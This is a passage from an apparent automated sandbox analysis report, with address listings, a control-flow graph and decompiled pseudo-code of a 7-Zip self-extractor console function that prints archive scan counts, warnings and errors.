				}
			}







































                                                                                                                    0x00b48e42
                                                                                                                    0x00b48e42
                                                                                                                    0x00b48e49
                                                                                                                    0x00b491ab
                                                                                                                    0x00b491ae
                                                                                                                    0x00b491b1
                                                                                                                    0x00b491b4
                                                                                                                    0x00b491b7
                                                                                                                    0x00b491ba
                                                                                                                    0x00b491bd
                                                                                                                    0x00b491c4
                                                                                                                    0x00b491ca
                                                                                                                    0x00b491ce
                                                                                                                    0x00b49203
                                                                                                                    0x00b4920e
                                                                                                                    0x00b49213
                                                                                                                    0x00b49223
                                                                                                                    0x00b4922a
                                                                                                                    0x00b4922c
                                                                                                                    0x00b49232
                                                                                                                    0x00b4923e
                                                                                                                    0x00b49247
                                                                                                                    0x00b49251
                                                                                                                    0x00b49253
                                                                                                                    0x00b49259
                                                                                                                    0x00b4925b
                                                                                                                    0x00b49262
                                                                                                                    0x00b4926d
                                                                                                                    0x00b49273
                                                                                                                    0x00b49273
                                                                                                                    0x00b49262
                                                                                                                    0x00b4927e
                                                                                                                    0x00b49284
                                                                                                                    0x00b4928a
                                                                                                                    0x00b49290
                                                                                                                    0x00b49296
                                                                                                                    0x00b4929c
                                                                                                                    0x00b492a2
                                                                                                                    0x00b492a8
                                                                                                                    0x00b492ae
                                                                                                                    0x00b492b4
                                                                                                                    0x00b492ba
                                                                                                                    0x00b492c0
                                                                                                                    0x00b492c3
                                                                                                                    0x00b492cb
                                                                                                                    0x00b492d8
                                                                                                                    0x00b492df
                                                                                                                    0x00b492e3
                                                                                                                    0x00b492e7
                                                                                                                    0x00b492e8
                                                                                                                    0x00b492ef
                                                                                                                    0x00b492f3
                                                                                                                    0x00b492f8
                                                                                                                    0x00b492fb
                                                                                                                    0x00b49302
                                                                                                                    0x00b49307
                                                                                                                    0x00b4930e
                                                                                                                    0x00b49318
                                                                                                                    0x00b49318
                                                                                                                    0x00b4931d
                                                                                                                    0x00b49320
                                                                                                                    0x00b49322
                                                                                                                    0x00b49329
                                                                                                                    0x00b49337
                                                                                                                    0x00b49338
                                                                                                                    0x00b49338
                                                                                                                    0x00b49329
                                                                                                                    0x00b49343
                                                                                                                    0x00b49347
                                                                                                                    0x00b4934c
                                                                                                                    0x00b4934f
                                                                                                                    0x00b49a3a
                                                                                                                    0x00b49a3d
                                                                                                                    0x00b49a41
                                                                                                                    0x00b49a49
                                                                                                                    0x00b49a4d
                                                                                                                    0x00b49a52
                                                                                                                    0x00b49a59
                                                                                                                    0x00b49a64
                                                                                                                    0x00b49a64
                                                                                                                    0x00b49a77
                                                                                                                    0x00b49a7d
                                                                                                                    0x00b49a87
                                                                                                                    0x00b49a8c
                                                                                                                    0x00b49a8f
                                                                                                                    0x00b49a93
                                                                                                                    0x00b49a95
                                                                                                                    0x00b49a9a
                                                                                                                    0x00b49a9a
                                                                                                                    0x00b49aa3
                                                                                                                    0x00b49aa7
                                                                                                                    0x00b49ab3
                                                                                                                    0x00b49ab8
                                                                                                                    0x00b49ac2
                                                                                                                    0x00b49ac7
                                                                                                                    0x00b49ace
                                                                                                                    0x00b49ad3
                                                                                                                    0x00b49adc
                                                                                                                    0x00b49ae4
                                                                                                                    0x00b49355
                                                                                                                    0x00b49355
                                                                                                                    0x00b49355
                                                                                                                    0x00b49359
                                                                                                                    0x00b49934
                                                                                                                    0x00b49938
                                                                                                                    0x00b4993f
                                                                                                                    0x00b49946
                                                                                                                    0x00b4994f
                                                                                                                    0x00b49956
                                                                                                                    0x00b4995f
                                                                                                                    0x00b49960
                                                                                                                    0x00b49963
                                                                                                                    0x00b49969
                                                                                                                    0x00b4996c
                                                                                                                    0x00b4996f
                                                                                                                    0x00b49974
                                                                                                                    0x00b49980
                                                                                                                    0x00b49984
                                                                                                                    0x00b4998d
                                                                                                                    0x00b49993
                                                                                                                    0x00b49997
                                                                                                                    0x00b4999e
                                                                                                                    0x00b499a4
                                                                                                                    0x00b499ab
                                                                                                                    0x00b499ac
                                                                                                                    0x00b499b1
                                                                                                                    0x00b499b8
                                                                                                                    0x00b499c0
                                                                                                                    0x00b499f6
                                                                                                                    0x00b499f6
                                                                                                                    0x00b499f9
                                                                                                                    0x00b49a00
                                                                                                                    0x00b49a00
                                                                                                                    0x00b49a07
                                                                                                                    0x00b49a0b
                                                                                                                    0x00b49a1b
                                                                                                                    0x00b49a2e
                                                                                                                    0x00b49a2e
                                                                                                                    0x00b49a33
                                                                                                                    0x00000000
                                                                                                                    0x00b49a33
                                                                                                                    0x00b499fb
                                                                                                                    0x00b499fe
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b499fe
                                                                                                                    0x00b499c2
                                                                                                                    0x00b499c5
                                                                                                                    0x00b499cc
                                                                                                                    0x00b499ce
                                                                                                                    0x00b499de
                                                                                                                    0x00b499f1
                                                                                                                    0x00000000
                                                                                                                    0x00b499f1
                                                                                                                    0x00b499c7
                                                                                                                    0x00b499ca
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b499ca
                                                                                                                    0x00b4935f
                                                                                                                    0x00b49364
                                                                                                                    0x00b4936a
                                                                                                                    0x00b4936d
                                                                                                                    0x00b4936f
                                                                                                                    0x00b49373
                                                                                                                    0x00b49380
                                                                                                                    0x00b49380
                                                                                                                    0x00b49375
                                                                                                                    0x00b4937c
                                                                                                                    0x00b4937c
                                                                                                                    0x00b49382
                                                                                                                    0x00b49384
                                                                                                                    0x00b49388
                                                                                                                    0x00b4938b
                                                                                                                    0x00b49390
                                                                                                                    0x00b49390
                                                                                                                    0x00b49399
                                                                                                                    0x00b4939f
                                                                                                                    0x00b493ac
                                                                                                                    0x00b493b0
                                                                                                                    0x00b493c6
                                                                                                                    0x00b493cb
                                                                                                                    0x00b493d2
                                                                                                                    0x00b493d5
                                                                                                                    0x00b493e1
                                                                                                                    0x00b493ea
                                                                                                                    0x00b493f0
                                                                                                                    0x00b493f5
                                                                                                                    0x00b493f5
                                                                                                                    0x00b493f6
                                                                                                                    0x00b493f6
                                                                                                                    0x00b49402
                                                                                                                    0x00b49413
                                                                                                                    0x00b49414
                                                                                                                    0x00b49418
                                                                                                                    0x00b49423
                                                                                                                    0x00b4942a
                                                                                                                    0x00b49430
                                                                                                                    0x00b49436
                                                                                                                    0x00b4943c
                                                                                                                    0x00b49445
                                                                                                                    0x00b49458
                                                                                                                    0x00b49460
                                                                                                                    0x00b4946b
                                                                                                                    0x00b4946f
                                                                                                                    0x00b49474
                                                                                                                    0x00b4947a
                                                                                                                    0x00b4947e
                                                                                                                    0x00b49481
                                                                                                                    0x00b4948f
                                                                                                                    0x00b49498
                                                                                                                    0x00b494a0
                                                                                                                    0x00b494a0
                                                                                                                    0x00b494b1
                                                                                                                    0x00b494b5
                                                                                                                    0x00b494b8
                                                                                                                    0x00b494bb
                                                                                                                    0x00b494c0
                                                                                                                    0x00b494c8
                                                                                                                    0x00b494c9
                                                                                                                    0x00b494cc
                                                                                                                    0x00b494ce
                                                                                                                    0x00b494d9
                                                                                                                    0x00b494dd
                                                                                                                    0x00b494de
                                                                                                                    0x00b494e5
                                                                                                                    0x00b494e9
                                                                                                                    0x00b494f0
                                                                                                                    0x00b494f7
                                                                                                                    0x00b494fc
                                                                                                                    0x00b49502
                                                                                                                    0x00b49505
                                                                                                                    0x00b49509
                                                                                                                    0x00b4950c
                                                                                                                    0x00b4950c
                                                                                                                    0x00b49511
                                                                                                                    0x00b49514
                                                                                                                    0x00b49516
                                                                                                                    0x00b4951b
                                                                                                                    0x00b4951d
                                                                                                                    0x00b49521
                                                                                                                    0x00b49524
                                                                                                                    0x00b49533
                                                                                                                    0x00b4953a
                                                                                                                    0x00b49542
                                                                                                                    0x00b4954c
                                                                                                                    0x00b4954c
                                                                                                                    0x00b49551
                                                                                                                    0x00b49554
                                                                                                                    0x00b49556
                                                                                                                    0x00b49556
                                                                                                                    0x00b49554
                                                                                                                    0x00b4955d
                                                                                                                    0x00b49563
                                                                                                                    0x00b49567
                                                                                                                    0x00b49569
                                                                                                                    0x00b495cd
                                                                                                                    0x00b495d3
                                                                                                                    0x00b495d9
                                                                                                                    0x00b495db
                                                                                                                    0x00b495dd
                                                                                                                    0x00b495e1
                                                                                                                    0x00b495ea
                                                                                                                    0x00b49603
                                                                                                                    0x00b49603
                                                                                                                    0x00b495e1
                                                                                                                    0x00b4960e
                                                                                                                    0x00b49614
                                                                                                                    0x00b49647
                                                                                                                    0x00b49647
                                                                                                                    0x00b49649
                                                                                                                    0x00b49651
                                                                                                                    0x00b49651
                                                                                                                    0x00b49657
                                                                                                                    0x00b4965a
                                                                                                                    0x00b49663
                                                                                                                    0x00b49666
                                                                                                                    0x00b4967b
                                                                                                                    0x00b4967b
                                                                                                                    0x00b49686
                                                                                                                    0x00b4968c
                                                                                                                    0x00b49690
                                                                                                                    0x00b4969b
                                                                                                                    0x00b496a1
                                                                                                                    0x00b496aa
                                                                                                                    0x00b496c3
                                                                                                                    0x00b496c3
                                                                                                                    0x00b496a1
                                                                                                                    0x00b4968c
                                                                                                                    0x00000000
                                                                                                                    0x00b49616
                                                                                                                    0x00b49616
                                                                                                                    0x00b49618
                                                                                                                    0x00b4961c
                                                                                                                    0x00b496c8
                                                                                                                    0x00b496ce
                                                                                                                    0x00b496d4
                                                                                                                    0x00b49718
                                                                                                                    0x00b49718
                                                                                                                    0x00b4971c
                                                                                                                    0x00b49725
                                                                                                                    0x00b49725
                                                                                                                    0x00b49727
                                                                                                                    0x00b498de
                                                                                                                    0x00b498e4
                                                                                                                    0x00b498f0
                                                                                                                    0x00b498fc
                                                                                                                    0x00b49900
                                                                                                                    0x00b4990b
                                                                                                                    0x00b4990f
                                                                                                                    0x00b49914
                                                                                                                    0x00b49916
                                                                                                                    0x00b4991a
                                                                                                                    0x00b49923
                                                                                                                    0x00b49923
                                                                                                                    0x00000000
                                                                                                                    0x00b4991a
                                                                                                                    0x00b49733
                                                                                                                    0x00b49739
                                                                                                                    0x00b498a2
                                                                                                                    0x00b498a4
                                                                                                                    0x00b498af
                                                                                                                    0x00b498af
                                                                                                                    0x00b498b5
                                                                                                                    0x00b498b8
                                                                                                                    0x00b498c1
                                                                                                                    0x00b498c4
                                                                                                                    0x00b498d9
                                                                                                                    0x00b498d9
                                                                                                                    0x00000000
                                                                                                                    0x00b498b8
                                                                                                                    0x00b49745
                                                                                                                    0x00b49745
                                                                                                                    0x00b4974b
                                                                                                                    0x00b4974e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b49754
                                                                                                                    0x00b49758
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4975e
                                                                                                                    0x00b49766
                                                                                                                    0x00b4976c
                                                                                                                    0x00b49775
                                                                                                                    0x00b4978e
                                                                                                                    0x00b49793
                                                                                                                    0x00b49793
                                                                                                                    0x00b49799
                                                                                                                    0x00b497a0
                                                                                                                    0x00b497be
                                                                                                                    0x00b497c5
                                                                                                                    0x00b497d7
                                                                                                                    0x00b497de
                                                                                                                    0x00b497e9
                                                                                                                    0x00b497ec
                                                                                                                    0x00b497f5
                                                                                                                    0x00b4980b
                                                                                                                    0x00b49817
                                                                                                                    0x00b49830
                                                                                                                    0x00b49830
                                                                                                                    0x00000000
                                                                                                                    0x00b497a2
                                                                                                                    0x00b497a2
                                                                                                                    0x00b497a9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b497ab
                                                                                                                    0x00b497b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b497b9
                                                                                                                    0x00b497bc
                                                                                                                    0x00b49835
                                                                                                                    0x00b4983c
                                                                                                                    0x00b4984e
                                                                                                                    0x00b49855
                                                                                                                    0x00b49858
                                                                                                                    0x00b49867
                                                                                                                    0x00b4987a
                                                                                                                    0x00b49881
                                                                                                                    0x00b49886
                                                                                                                    0x00b4988a
                                                                                                                    0x00b4988e
                                                                                                                    0x00b4989b
                                                                                                                    0x00b4989b
                                                                                                                    0x00000000
                                                                                                                    0x00b4988a
                                                                                                                    0x00000000
                                                                                                                    0x00b497bc
                                                                                                                    0x00b497a0
                                                                                                                    0x00b4971e
                                                                                                                    0x00b4971e
                                                                                                                    0x00000000
                                                                                                                    0x00b4971e
                                                                                                                    0x00b496d6
                                                                                                                    0x00b496d8
                                                                                                                    0x00b496dc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b496e0
                                                                                                                    0x00b496eb
                                                                                                                    0x00b496f1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b496fa
                                                                                                                    0x00b49713
                                                                                                                    0x00000000
                                                                                                                    0x00b49713
                                                                                                                    0x00b49629
                                                                                                                    0x00b49642
                                                                                                                    0x00000000
                                                                                                                    0x00b49642
                                                                                                                    0x00b4956b
                                                                                                                    0x00b4956d
                                                                                                                    0x00b49572
                                                                                                                    0x00b49579
                                                                                                                    0x00b49584
                                                                                                                    0x00b4958b
                                                                                                                    0x00b4958e
                                                                                                                    0x00b495a3
                                                                                                                    0x00b495af
                                                                                                                    0x00b495c8
                                                                                                                    0x00000000
                                                                                                                    0x00b495c8
                                                                                                                    0x00b4957b
                                                                                                                    0x00b49582
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b49582
                                                                                                                    0x00b49569
                                                                                                                    0x00b4934f
                                                                                                                    0x00b491d3
                                                                                                                    0x00b491e1
                                                                                                                    0x00b491e2
                                                                                                                    0x00b491ea
                                                                                                                    0x00b491f8
                                                                                                                    0x00b491f9
                                                                                                                    0x00000000
                                                                                                                    0x00b491f9
                                                                                                                    0x00b48e5c
                                                                                                                    0x00b4905d
                                                                                                                    0x00b49064
                                                                                                                    0x00b4919e
                                                                                                                    0x00b4919f
                                                                                                                    0x00000000
                                                                                                                    0x00b4919f
                                                                                                                    0x00b49070
                                                                                                                    0x00b49075
                                                                                                                    0x00b49078
                                                                                                                    0x00b4907c
                                                                                                                    0x00b49081
                                                                                                                    0x00b49081
                                                                                                                    0x00b49082
                                                                                                                    0x00b49082
                                                                                                                    0x00b49088
                                                                                                                    0x00b4908e
                                                                                                                    0x00b4909a
                                                                                                                    0x00b490a8
                                                                                                                    0x00b490b4
                                                                                                                    0x00b490c1
                                                                                                                    0x00b490c7
                                                                                                                    0x00b490cd
                                                                                                                    0x00b490d3
                                                                                                                    0x00b490db
                                                                                                                    0x00b490ec
                                                                                                                    0x00b490f0
                                                                                                                    0x00b490f7
                                                                                                                    0x00b49106
                                                                                                                    0x00b49109
                                                                                                                    0x00b49118
                                                                                                                    0x00b4911c
                                                                                                                    0x00b49121
                                                                                                                    0x00b49126
                                                                                                                    0x00b49128
                                                                                                                    0x00b4912a
                                                                                                                    0x00b4912c
                                                                                                                    0x00b4912c
                                                                                                                    0x00b49132
                                                                                                                    0x00b49140
                                                                                                                    0x00b49144
                                                                                                                    0x00b4914b
                                                                                                                    0x00b49152
                                                                                                                    0x00b4915b
                                                                                                                    0x00b49164
                                                                                                                    0x00b4917b
                                                                                                                    0x00b49181
                                                                                                                    0x00b4918c
                                                                                                                    0x00000000
                                                                                                                    0x00b48e62
                                                                                                                    0x00b48e69
                                                                                                                    0x00b48e6b
                                                                                                                    0x00b48e71
                                                                                                                    0x00b48e7e
                                                                                                                    0x00b48e7e
                                                                                                                    0x00b48e71
                                                                                                                    0x00b48e89
                                                                                                                    0x00b48e8e
                                                                                                                    0x00b48e93
                                                                                                                    0x00b48e9d
                                                                                                                    0x00b48ea3
                                                                                                                    0x00b48ea8
                                                                                                                    0x00b48eac
                                                                                                                    0x00b48eb2
                                                                                                                    0x00b48eb8
                                                                                                                    0x00b48ec8
                                                                                                                    0x00b48ec8
                                                                                                                    0x00b48ec8
                                                                                                                    0x00b48ec8
                                                                                                                    0x00b48ecc
                                                                                                                    0x00b48ed5
                                                                                                                    0x00b48ee2
                                                                                                                    0x00b48eed
                                                                                                                    0x00b48efa
                                                                                                                    0x00b48f03
                                                                                                                    0x00b48f07
                                                                                                                    0x00b48f0d
                                                                                                                    0x00b48f13
                                                                                                                    0x00b48f13
                                                                                                                    0x00b48f23
                                                                                                                    0x00b48f29
                                                                                                                    0x00b48f3c
                                                                                                                    0x00b48f3c
                                                                                                                    0x00b48f3c
                                                                                                                    0x00b48f3c
                                                                                                                    0x00b48f43
                                                                                                                    0x00b48f50
                                                                                                                    0x00b48f5b
                                                                                                                    0x00b48f61
                                                                                                                    0x00b48f6d
                                                                                                                    0x00b48f73
                                                                                                                    0x00b48f7b
                                                                                                                    0x00b48f85
                                                                                                                    0x00b48f8b
                                                                                                                    0x00b48f91
                                                                                                                    0x00b48f97
                                                                                                                    0x00b48fcd
                                                                                                                    0x00b48fdd
                                                                                                                    0x00b48fe0
                                                                                                                    0x00b48fea
                                                                                                                    0x00b48fea
                                                                                                                    0x00b48fef
                                                                                                                    0x00b48ff4
                                                                                                                    0x00b48ff8
                                                                                                                    0x00b48ffa
                                                                                                                    0x00b48ffa
                                                                                                                    0x00b49000
                                                                                                                    0x00b49002
                                                                                                                    0x00b49006
                                                                                                                    0x00b49012
                                                                                                                    0x00b49019
                                                                                                                    0x00b49022
                                                                                                                    0x00b49028
                                                                                                                    0x00b49034
                                                                                                                    0x00b4903a
                                                                                                                    0x00b49044
                                                                                                                    0x00b4904f
                                                                                                                    0x00b49053
                                                                                                                    0x00000000
                                                                                                                    0x00b49053
                                                                                                                    0x00b48f2b
                                                                                                                    0x00b48f31
                                                                                                                    0x00000000
                                                                                                                    0x00b48f33
                                                                                                                    0x00b48f33
                                                                                                                    0x00000000
                                                                                                                    0x00b48f33
                                                                                                                    0x00b48f31
                                                                                                                    0x00b48eba
                                                                                                                    0x00b48ec0
                                                                                                                    0x00000000
                                                                                                                    0x00b48ec2
                                                                                                                    0x00b48ec2
                                                                                                                    0x00000000
                                                                                                                    0x00b48ec2
                                                                                                                    0x00b48ec0

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$ExceptionThrow
                                                                                                                    • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $S
                                                                                                                    • API String ID: 3665150552-3874897568
                                                                                                                    • Opcode ID: 1dba139bbf9a353664e0507024001a9d300d37a2093df11d207e2b86e09c1192
                                                                                                                    • Instruction ID: 1321a1fb0e457864bbcfd60ed110afdbfe6bacd29815fb70734e2a9a9437793d
                                                                                                                    • Opcode Fuzzy Hash: 1dba139bbf9a353664e0507024001a9d300d37a2093df11d207e2b86e09c1192
                                                                                                                    • Instruction Fuzzy Hash: 105246319042589FDF26EBA4C895BEEBBF5AF44300F1445DAE049672A2EB306B85DF11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4925B Relevance: 56.5, APIs: 15, Strings: 17, Instructions: 503COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 274 b4925b-b49262 275 b49264-b49273 fputs call b11fe9 274->275 276 b49278-b4930e call b44249 call b12d90 call b30621 call b11e89 274->276 275->276 286 b49310-b49318 call b4b618 276->286 287 b4931d-b49320 276->287 286->287 289 b49322-b49329 287->289 290 b4933d-b4934f call b4b57f 287->290 289->290 291 b4932b-b49338 call b445e7 289->291 295 b49355-b49373 call b11e55 290->295 296 b49a3a-b49a59 call b41b84 * 2 290->296 291->290 304 b49375-b4937e call b49f2e 295->304 305 b49380 295->305 306 b49a69-b49a95 call b4a7a1 call b11e89 call b32046 296->306 307 b49a5b-b49a62 296->307 308 b49382-b4938b 304->308 305->308 328 b49a97-b49a99 306->328 329 b49a9d-b49ae4 call b11e89 call b111c2 call b4ac40 call b41b84 306->329 307->306 310 b49a64 call b4a7bc 307->310 313 b49393-b493f0 call b12f78 call b4a0ab 308->313 314 b4938d-b4938f 308->314 310->306 324 b493f2-b493f6 313->324 325 b493fc-b49481 call b49b35 call b4ad72 call b22722 call b12d90 call b3315c 313->325 314->313 324->325 348 b494a5-b49505 call b30e95 325->348 349 b49483-b494a0 call b3255b call b4a7a1 325->349 328->329 355 b49507-b4950c call b4b618 348->355 356 b49511-b49514 348->356 349->348 355->356 358 b49516-b4951d 356->358 359 b4955d-b49569 356->359 362 b49551-b49554 358->362 363 b4951f-b4954c call b11fe9 fputs call b11fe9 call b11ffc call b11fe9 358->363 360 b495cd-b495d9 359->360 361 b4956b-b49579 call b11fe9 359->361 364 b49608-b49614 360->364 365 b495db-b495e1 360->365 375 b49584-b495c8 fputs call b1224a call b11fe9 fputs call b1224a call b11fe9 361->375 376 b4957b-b49582 361->376 362->359 366 b49556 362->366 363->362 371 b49616-b4961c 364->371 372 b49647-b49649 364->372 365->364 369 b495e3-b49603 fputs call b1224a call b11fe9 365->369 366->359 369->364 377 b49622-b49642 fputs call b1224a call b11fe9 371->377 378 b496c8-b496d4 371->378 372->378 380 b4964b-b4965a 372->380 375->360 376->360 376->375 377->372 386 b496d6-b496dc 378->386 387 b49718-b4971c 378->387 381 b49680-b4968c 380->381 382 b4965c-b4967b fputs call b1224a call b11fe9 380->382 381->378 391 b4968e-b496a1 call b11fe9 381->391 382->381 393 b4971e 386->393 397 b496de-b496f1 call b11fe9 386->397 392 b49725-b49727 387->392 387->393 391->378 416 b496a3-b496c3 fputs call b1224a call b11fe9 391->416 401 b4972d-b49739 392->401 402 b498de-b4991a call b331ca call b11e89 call b4af38 call b49bb1 392->402 393->392 397->393 414 b496f3-b49713 fputs call b1224a call b11fe9 397->414 411 b498a2-b498b8 call b11fe9 401->411 412 b4973f-b4974e 401->412 402->296 456 b49920-b49926 402->456 411->402 430 b498ba-b498d7 fputs call b1224a 411->430 412->411 418 b49754-b49758 412->418 414->387 416->378 418->402 425 b4975e-b4976c 418->425 431 b4976e-b49793 fputs call b1224a call b11fe9 425->431 432 b49799-b497a0 425->432 430->402 448 b498d9 call b11fe9 430->448 431->432 433 b497a2-b497a9 432->433 434 b497be-b497d7 fputs call b1224a 432->434 433->434 440 b497ab-b497b1 433->440 446 b497dc-b497ec call b11fe9 434->446 440->434 445 b497b3-b497bc 440->445 445->434 451 b49835-b4987a fputs call b1224a call b11fe9 fputs call b1224a 445->451 446->451 458 b497ee-b49830 fputs call b1224a call b11fe9 fputs call b1224a call b11fe9 446->458 448->402 466 b4987f-b4988a call b11fe9 451->466 456->296 458->451 466->402 473 b4988c-b498a0 call b11fe9 call b45f3d 466->473 473->402
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00B4925B(struct _IO_FILE** __eax, intOrPtr* __ebx, signed int __edi) {
				void* _t252;
				intOrPtr _t253;
				intOrPtr* _t261;
				intOrPtr _t266;
				intOrPtr _t277;
				signed int _t286;
				signed int _t298;
				intOrPtr _t310;
				void* _t326;
				signed int _t332;
				void* _t334;
				struct _IO_FILE** _t339;
				void* _t343;
				struct _IO_FILE** _t392;
				intOrPtr _t405;
				intOrPtr* _t414;
				signed int _t565;
				struct _IO_FILE** _t567;
				signed int _t570;
				struct _IO_FILE** _t571;
				void* _t572;
				intOrPtr _t585;

				_t565 = __edi;
				_t414 = __ebx;
				_t575 =  *((char*)(_t572 - 0x338));
				if( *((char*)(_t572 - 0x338)) != 0) {
					_t571 = __eax;
					fputs("Scanning the drive for archives:",  *__eax); // executed
					E00B11FE9(_t571);
				}
				 *(_t572 - 0xac) = _t565;
				 *(_t572 - 0xa8) = _t565;
				 *(_t572 - 0xa4) = _t565;
				 *(_t572 - 0xa0) = _t565;
				 *(_t572 - 0x9c) = _t565;
				 *(_t572 - 0x98) = _t565;
				 *(_t572 - 0x94) = _t565;
				 *(_t572 - 0x90) = _t565;
				 *(_t572 - 0x8c) = _t565;
				 *(_t572 - 0x88) = _t565;
				 *(_t572 - 0x84) = _t565;
				 *(_t572 - 0x80) = _t565;
				E00B44249(_t572 - 0x44c);
				_t252 = E00B12D90(_t572 - 0x60);
				_push(_t572 - 0x44c);
				_push(_t572 - 0xac);
				_push(_t572 - 0x38);
				_push(_t572 - 0x78);
				_push(_t252);
				 *(_t572 - 4) = 0xe;
				_t253 = E00B30621(_t414, _t572 - 0x2cc, 0, _t565, _t575); // executed
				 *((intOrPtr*)(_t572 - 0x20)) = _t253;
				 *(_t572 - 4) = 0xd;
				E00B11E89(_t253,  *((intOrPtr*)(_t572 - 0x60)));
				if( *((intOrPtr*)(_t572 - 0x398)) != _t565) {
					E00B4B618(_t572 - 0x43c, _t565, 1); // executed
				}
				if( *((intOrPtr*)(_t572 - 0x20)) == _t565 &&  *((char*)(_t572 - 0x338)) != 0) {
					_push(_t572 - 0xac); // executed
					E00B445E7(_t572 - 0x44c); // executed
				}
				 *(_t572 - 4) = 0xc;
				L00B4B57F(_t572 - 0x43c);
				if( *((intOrPtr*)(_t572 - 0x20)) != _t565) {
					L74:
					 *(_t572 - 4) = 0xb;
					L00B41B84(_t414, _t572 - 0x38);
					 *(_t572 - 4) = 8;
					L00B41B84(_t414, _t572 - 0x78);
					if( *((char*)(_t572 - 0x334)) != 0 &&  *0xb9a894 != 0) {
						E00B4A7BC();
					}
					E00B11E89(E00B4A7A1( *((intOrPtr*)(_t572 - 0x20))),  *((intOrPtr*)(_t572 - 0xcc)));
					 *(_t572 - 4) = 6;
					E00B32046(_t572 - 0xc0);
					_t261 =  *((intOrPtr*)(_t572 - 0x2c));
					 *(_t572 - 4) = 4;
					_t621 = _t261;
					if(_t261 != 0) {
						_t261 =  *((intOrPtr*)( *_t261 + 8))(_t261);
					}
					 *(_t572 - 4) = 2;
					E00B11E89(_t261,  *((intOrPtr*)(_t572 - 0xdc)));
					L00B111C2(_t572 - 0x108);
					 *(_t572 - 4) =  *(_t572 - 4) & 0x00000000;
					E00B4AC40(_t414, _t572 - 0x340, _t621);
					 *(_t572 - 4) =  *(_t572 - 4) | 0xffffffff;
					L00B41B84(_t414, _t572 - 0x6c);
					_t266 =  *((intOrPtr*)(_t572 - 0x28));
					 *[fs:0x0] =  *((intOrPtr*)(_t572 - 0xc));
					return _t266;
				}
				if( *(_t572 - 0xd) == 0) {
					_push(_t572 - 0x5c);
					_push(_t572 - 0x50);
					_push(_t572 - 0x2a4);
					 *(_t572 - 0x24) =  *((intOrPtr*)(_t572 - 0x308));
					_push(_t572 - 0x2e4);
					 *((char*)(_t572 - 0x23)) =  *((intOrPtr*)(_t572 - 0x307));
					_push(_t572 - 0x2e8);
					 *(_t572 - 0x50) = _t565;
					_push( *((intOrPtr*)(_t572 - 0x335)));
					 *(_t572 - 0x4c) = _t565;
					 *(_t572 - 0x5c) = _t565;
					 *(_t572 - 0x58) = _t565;
					_push( *((intOrPtr*)(_t572 - 0x338)));
					_push( *((intOrPtr*)( *((intOrPtr*)(_t572 - 0x314)))) + 0xc);
					_push( *((intOrPtr*)(_t572 - 0x331)));
					_push( *((intOrPtr*)(_t572 - 0x270)));
					_push(_t572 - 0x38);
					_push(_t572 - 0x78);
					_push( *((intOrPtr*)(_t572 - 0x33a)));
					_push(_t572 - 0xcc);
					_push(_t572 - 0xc0);
					_t277 = L00B4752C(_t572 - 0x24,  *((intOrPtr*)(_t572 - 0x2c)), __eflags);
					__eflags =  *((char*)(_t572 - 0x338));
					 *((intOrPtr*)(_t572 - 0x20)) = _t277;
					if( *((char*)(_t572 - 0x338)) == 0) {
						L69:
						__eflags =  *(_t572 - 0x4c) - _t565;
						if( *(_t572 - 0x4c) > _t565) {
							L71:
							__eflags =  *((char*)(_t572 - 0x338));
							if( *((char*)(_t572 - 0x338)) != 0) {
								E00B11FE9(0xb9a5b0);
								 *_t414("Errors: ",  *0xb9a5b0);
								E00B11FE9(E00B1224A(0xb9a5b0,  *(_t572 - 0x50),  *(_t572 - 0x4c)));
							}
							 *((intOrPtr*)(_t572 - 0x28)) = 2;
							goto L74;
						}
						__eflags =  *(_t572 - 0x50) - _t565;
						if( *(_t572 - 0x50) <= _t565) {
							goto L74;
						}
						goto L71;
					}
					__eflags =  *(_t572 - 0x58) - _t565;
					if( *(_t572 - 0x58) > _t565) {
						L68:
						E00B11FE9(0xb9a5b0);
						 *_t414("Warnings: ",  *0xb9a5b0);
						E00B11FE9(E00B1224A(0xb9a5b0,  *(_t572 - 0x5c),  *(_t572 - 0x58)));
						goto L69;
					}
					__eflags =  *(_t572 - 0x5c) - _t565;
					if( *(_t572 - 0x5c) <= _t565) {
						goto L69;
					}
					goto L68;
				} else {
					_push(0x170);
					_t286 = E00B11E55();
					 *(_t572 - 0x58) = _t286;
					_t581 = _t286 - _t565;
					 *(_t572 - 4) = 0xf;
					if(_t286 == _t565) {
						_t570 = 0;
						__eflags = 0;
					} else {
						_t570 = L00B49F2E(_t286, _t581);
					}
					 *(_t572 - 4) = 0xc;
